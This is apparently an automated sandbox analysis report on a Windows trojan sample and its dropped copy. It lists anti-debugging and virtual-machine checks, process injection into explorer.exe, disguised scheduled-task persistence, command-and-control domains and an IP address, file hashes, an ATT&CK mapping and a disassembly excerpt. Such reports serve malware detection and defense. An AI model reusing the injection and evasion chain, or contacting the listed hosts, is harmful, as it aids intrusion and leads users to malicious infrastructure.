                  Source: explorer.exe, 00000002.00000000.332804136.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.349905384.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                  Source: explorer.exe, 00000002.00000000.332804136.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                  Source: explorer.exe, 00000002.00000000.332334752.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

                  Anti Debugging

                  barindex
                  Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeSystem information queried: CodeIntegrityInformationJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040DAC5
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAD4 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040DAD4
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412320 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00412320
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00490042 push dword ptr fs:[00000030h]0_2_00490042
                  Source: C:\Users\user\AppData\Roaming\dubewgeCode function: 5_2_007E0042 push dword ptr fs:[00000030h]5_2_007E0042
                  Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeProcess queried: DebugPortJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C824 SetUnhandledExceptionFilter,0_2_0040C824
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00411135 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00411135
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040DAC5
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040973F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040973F

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Windows\explorer.exeFile created: dubewge.2.drJump to dropped file
                  Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                  Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                  Source: C:\Users\user\Desktop\file.exeMemory written: C:\Users\user\Desktop\file.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeMemory written: C:\Users\user\AppData\Roaming\dubewge base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00490110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,0_2_00490110
                  Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 2971930Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeThread created: unknown EIP: 5291930Jump to behavior
                  Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\dubewgeProcess created: C:\Users\user\AppData\Roaming\dubewge C:\Users\user\AppData\Roaming\dubewgeJump to behavior
                  Source: explorer.exe, 00000002.00000000.381647798.0000000005910000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.357589879.00000000086B6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.316363758.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000002.00000000.316363758.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.348356612.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.376549915.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: uProgram Manager*r
                  Source: explorer.exe, 00000002.00000000.316363758.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.348356612.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.376549915.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000002.00000000.316363758.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.348356612.0000000000ED0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.376549915.0000000000ED0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: explorer.exe, 00000002.00000000.375706073.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.347798579.0000000000878000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.316155724.0000000000878000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanLoc*U
                  Source: C:\Users\user\Desktop\file.exeCode function: GetLocaleInfoA,0_2_004134ED
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CBB2 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040CBB2

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: 1.0.file.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.file.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.4915a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.dubewge.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.dubewge.7e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.389552753.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.389415953.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.453701840.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: 1.0.file.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.file.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.file.exe.4915a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.0.dubewge.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.dubewge.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.dubewge.7e15a0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 1.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000000.377043487.0000000002971000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.453507425.0000000000460000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.389552753.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.389415953.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.453701840.0000000001F51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                  Valid Accounts2
                  Command and Scripting Interpreter
                  1
                  DLL Side-Loading
                  512
                  Process Injection
                  11
                  Masquerading
                  OS Credential Dumping1
                  System Time Discovery
                  Remote Services1
                  Archive Collected Data
                  Exfiltration Over Other Network Medium1
                  Encrypted Channel
                  Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                  Default Accounts2
                  Native API
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  12
                  Virtualization/Sandbox Evasion
                  LSASS Memory331
                  Security Software Discovery
                  Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth2
                  Non-Application Layer Protocol
                  Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                  Domain Accounts1
                  Exploitation for Client Execution
                  Logon Script (Windows)Logon Script (Windows)512
                  Process Injection
                  Security Account Manager12
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration112
                  Application Layer Protocol
                  Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                  Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                  Deobfuscate/Decode Files or Information
                  NTDS2
                  Process Discovery
                  Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                  Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                  Hidden Files and Directories
                  LSA Secrets1
                  Application Window Discovery
                  SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                  Replication Through Removable MediaLaunchdRc.commonRc.common2
                  Obfuscated Files or Information
                  Cached Domain Credentials14
                  System Information Discovery
                  VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                  External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                  Software Packing
                  DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                  Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                  DLL Side-Loading
                  Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                  Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                  File Deletion
                  /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 764038 Sample: file.exe Startdate: 09/12/2022 Architecture: WINDOWS Score: 100 30 Snort IDS alert for network traffic 2->30 32 Multi AV Scanner detection for domain / URL 2->32 34 Malicious sample detected (through community Yara rule) 2->34 36 5 other signatures 2->36 7 file.exe 2->7         started        10 dubewge 2->10         started        process3 signatures4 46 Contains functionality to inject code into remote processes 7->46 48 Injects a PE file into a foreign processes 7->48 12 file.exe 7->12         started        50 Machine Learning detection for dropped file 10->50 15 dubewge 10->15         started        process5 signatures6 52 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->52 54 Maps a DLL or memory area into another process 12->54 56 Checks if the current machine is a virtual machine (disk enumeration) 12->56 17 explorer.exe 2 12->17 injected 58 Creates a thread in another existing process (thread injection) 15->58 process7 dnsIp8 26 host-file-host6.com 84.21.172.159, 49704, 80 COMBAHTONcombahtonGmbHDE Germany 17->26 28 host-host-file8.com 17->28 22 C:\Users\user\AppData\Roaming\dubewge, PE32 17->22 dropped 24 C:\Users\user\...\dubewge:Zone.Identifier, ASCII 17->24 dropped 38 System process connects to network (likely due to code injection or exploit) 17->38 40 Benign windows process drops PE files 17->40 42 Deletes itself after installation 17->42 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 17->44 file9 signatures10

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  file.exe100%Joe Sandbox ML
                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\dubewge100%Joe Sandbox ML
                  SourceDetectionScannerLabelLinkDownload
                  1.0.file.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  6.2.dubewge.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  6.0.dubewge.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  1.0.file.exe.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  6.0.dubewge.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  6.0.dubewge.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  1.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  0.2.file.exe.4915a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  1.0.file.exe.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  5.2.dubewge.7e15a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  6.0.dubewge.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  1.0.file.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  1.0.file.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  6.0.dubewge.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  1.0.file.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                  6.0.dubewge.400000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  1.0.file.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  6.0.dubewge.400000.3.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
                  SourceDetectionScannerLabelLink
                  host-file-host6.com20%VirustotalBrowse
                  host-host-file8.com18%VirustotalBrowse
                  SourceDetectionScannerLabelLink
                  http://host-file-host6.com/0%URL Reputationsafe
                  http://host-host-file8.com/100%URL Reputationmalware
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  host-file-host6.com
                  84.21.172.159
                  truetrueunknown
                  host-host-file8.com
                  unknown
                  unknowntrueunknown
                  NameMaliciousAntivirus DetectionReputation
                  http://host-file-host6.com/true
                  • URL Reputation: safe
                  unknown
                  http://host-host-file8.com/true
                  • URL Reputation: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000002.00000000.376090770.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.348098249.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.316275876.000000000091F000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    84.21.172.159
                    host-file-host6.comGermany
                    30823COMBAHTONcombahtonGmbHDEtrue
                    Joe Sandbox Version:36.0.0 Rainbow Opal
                    Analysis ID:764038
                    Start date and time:2022-12-09 10:53:08 +01:00
                    Joe Sandbox Product:CloudBasic
                    Overall analysis duration:0h 7m 42s
                    Hypervisor based Inspection enabled:false
                    Report type:full
                    Sample file name:file.exe
                    Cookbook file name:default.jbs
                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                    Number of analysed new started processes analysed:8
                    Number of new started drivers analysed:0
                    Number of existing processes analysed:0
                    Number of existing drivers analysed:0
                    Number of injected processes analysed:1
                    Technologies:
                    • HCA enabled
                    • EGA enabled
                    • HDC enabled
                    • AMSI enabled
                    Analysis Mode:default
                    Analysis stop reason:Timeout
                    Detection:MAL
                    Classification:mal100.troj.evad.winEXE@6/2@5/1
                    EGA Information:
                    • Successful, ratio: 100%
                    HDC Information:
                    • Successful, ratio: 91% (good quality ratio 83.5%)
                    • Quality average: 71.6%
                    • Quality standard deviation: 31.8%
                    HCA Information:
                    • Successful, ratio: 100%
                    • Number of executed functions: 23
                    • Number of non-executed functions: 16
                    Cookbook Comments:
                    • Found application associated with file extension: .exe
                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, conhost.exe, svchost.exe
                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com
                    • Not all processes where analyzed, report is missing behavior information
                    TimeTypeDescription
                    10:55:00Task SchedulerRun new task: Firefox Default Browser Agent 0242EB7423704CDD path: C:\Users\user\AppData\Roaming\dubewge
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    84.21.172.159file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    PlW1EFIbvc.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    wlKbhd5bsS.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    file.exeGet hashmaliciousBrowse
                    • host-file-host6.com/
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    host-file-host6.comfile.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    PlW1EFIbvc.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    wlKbhd5bsS.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                    COMBAHTONcombahtonGmbHDEfile.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    https://2gfnm.app.link/xHXJIVVbuvbGet hashmaliciousBrowse
                    • 84.21.172.16
                    PlW1EFIbvc.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    https://odggj.app.link/N51hIhDqzvbGet hashmaliciousBrowse
                    • 84.21.172.16
                    wlKbhd5bsS.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    TBN - SUPRAMAX PDA.PDF.jsGet hashmaliciousBrowse
                    • 84.21.172.33
                    181A0E4AA241E1BF7DA338760918724D3D1FB8FE828F2.exeGet hashmaliciousBrowse
                    • 160.20.145.136
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    https://pshoe.app.link/BsaHBSekuvbGet hashmaliciousBrowse
                    • 84.21.172.16
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    file.exeGet hashmaliciousBrowse
                    • 84.21.172.159
                    No context
                    No context
                    Process:C:\Windows\explorer.exe
                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):391168
                    Entropy (8bit):5.909021649149733
                    Encrypted:false
                    SSDEEP:6144:rOxLsKWxyoaRyxDnbHHawhh6K9W9ub8ded89kTt:rM4KWk0xD7pIK9W9Cac
                    MD5:6B8486D9065FB3105E8C8A14C58DD0ED
                    SHA1:B341177019C21155A02477B71A613B6C427CF067
                    SHA-256:6ACC6C36C8492B91F4FE44AEABC3AD69EEA2765259108BACBFBC9B57BFF24133
                    SHA-512:7CE1E07A979E4A65B6BC7C80178AA41E3845BBAFC79B6685F1E07ECDCADC5EF5E556F6F48468B31F9D928F30B4F51AC138F012F85B31685AD3395A7C71A5F6F3
                    Malicious:true
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L......`.................n...........p............@..........................`..............................................s..<............................@......................................0I..@............................................text...Vm.......n.................. ..`.data................r..............@....weme........p.......$..............@..@.hosetotp............0..............@..@.rsrc................4..............@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\explorer.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview:[ZoneTransfer]....ZoneId=0
                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                    Entropy (8bit):5.909021649149733
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:391168
                    MD5:6b8486d9065fb3105e8c8a14c58dd0ed
                    SHA1:b341177019c21155a02477b71a613b6c427cf067
                    SHA256:6acc6c36c8492b91f4fe44aeabc3ad69eea2765259108bacbfbc9b57bff24133
                    SHA512:7ce1e07a979e4a65b6bc7c80178aa41e3845bbafc79b6685f1e07ecdcadc5ef5e556f6f48468b31f9d928f30b4f51ac138f012f85b31685ad3395a7c71a5f6f3
                    SSDEEP:6144:rOxLsKWxyoaRyxDnbHHawhh6K9W9ub8ded89kTt:rM4KWk0xD7pIK9W9Cac
                    TLSH:3B84CF013689CBF2C7234D778815CBE0DA3FB46AFA245927F35A3B6F6E703915662211
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.m....C...C...C...C(..C...C...C...C...C$%xC...C...C}..C...C...C...C...C...C...CRich...C........PE..L......`.................n.
                    Icon Hash:8286dccea68c9ca4
                    Entrypoint:0x407096
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x60CAC7FC [Thu Jun 17 03:56:44 2021 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:5
                    OS Version Minor:0
                    File Version Major:5
                    File Version Minor:0
                    Subsystem Version Major:5
                    Subsystem Version Minor:0
                    Import Hash:eeffe9860bc9c6507e24465b9b5239be
                    Instruction
                    call 00007FDBF107281Ch
                    jmp 00007FDBF106CB7Eh
                    mov edi, edi
                    push ebp
                    mov ebp, esp
                    sub esp, 28h
                    xor eax, eax
                    push ebx
                    mov ebx, dword ptr [ebp+0Ch]
                    push esi
                    mov esi, dword ptr [ebp+10h]
                    push edi
                    mov edi, dword ptr [ebp+08h]
                    mov byte ptr [ebp-08h], al
                    mov byte ptr [ebp-07h], al
                    mov byte ptr [ebp-06h], al
                    mov byte ptr [ebp-05h], al
                    mov byte ptr [ebp-04h], al
                    mov byte ptr [ebp-03h], al
                    mov byte ptr [ebp-02h], al
                    mov byte ptr [ebp-01h], al
                    cmp dword ptr [00443244h], eax
                    je 00007FDBF106CD10h
                    push dword ptr [004461E8h]
                    call 00007FDBF1071748h
                    pop ecx
                    jmp 00007FDBF106CD07h
                    mov eax, 0040CC48h
                    mov ecx, dword ptr [ebp+14h]
                    mov edx, 000000A6h
                    cmp ecx, edx
                    jg 00007FDBF106CE7Ah
                    je 00007FDBF106CE61h
                    cmp ecx, 19h
                    jg 00007FDBF106CDFEh
                    je 00007FDBF106CDEFh
                    mov edx, ecx
                    push 00000002h
                    pop ecx
                    sub edx, ecx
                    je 00007FDBF106CDD3h
                    dec edx
                    je 00007FDBF106CDC3h
                    sub edx, 05h
                    je 00007FDBF106CDABh
                    dec edx
                    je 00007FDBF106CD8Ch
                    sub edx, 05h
                    je 00007FDBF106CD73h
                    dec edx
                    je 00007FDBF106CD47h
                    sub edx, 09h
                    jne 00007FDBF106CEDAh
                    mov dword ptr [ebp-28h], 00000003h
